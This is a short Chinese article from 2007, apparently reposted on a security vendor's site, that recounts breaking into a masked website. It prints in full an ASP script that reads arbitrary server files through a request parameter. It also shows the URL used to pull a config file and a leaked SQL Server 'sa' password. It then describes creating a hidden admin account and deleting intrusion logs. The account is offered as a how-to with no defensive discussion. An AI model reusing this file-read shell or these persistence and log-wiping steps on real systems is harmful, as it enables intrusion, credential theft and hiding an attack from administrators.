阅读全部内容

黑客是如何突破一流检测系统的

  [字体: ]


黑客是如何突破一流检测系统的

攻击目标:www.***.com
测试过的动作,一句话马,加密马,等。
测试结果:无效,无法上传,无法进入系统。
经过2天的分析,
然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码

-------------------------------------------------------------------------

<%
file=Request("file")
Set FSOOBJ=Server.CreateObject("Scripting.FileSystemObject")
if FSOOBJ.fileExists(file) then
Set myfile=FSOOBJ.opentextfile(file,1)
 Response.write "<pre>" & server.HTMLEncode(myfile.readall) &"</pre>"
 myfile.close
Set myfile=nothing
else
 Response.write "file(" & file & ") not exists."
end if
%>
-------------------------------------------------------------------------

http://www.***.com/view.asp?file=D:\wwwroot\index.asp

读取到的敏感内容
sql地址:***.***.***.***
帐号:sa 密码:u8f2444f

利用此帐号进入后,建立了123$的隐藏管理员用户,删除入侵日志后退出。



日期:2007年10月

【 hits:】 【 评论 】 【 推荐 】 【 打印
上一篇:ASP数据库插马小议
下一篇:四种防范网络钓鱼的方法
相关新闻      
为什么选择连天科技
河南连天科技有限公司 ( LianTian Technology Co.,Ltd. ),是国内从事网络安全的高科技企业之一。
连天科技是Radware、Mirage、绿盟、AVENTAIL、Sonicwall、比蒙等国际国内知名厂商的河南区域战略合作伙伴,我们本着“专业、专注、全心、全程”的服务理念为客户提供全面的信息安全解决方案,协助客户建立安全可靠的运营环境。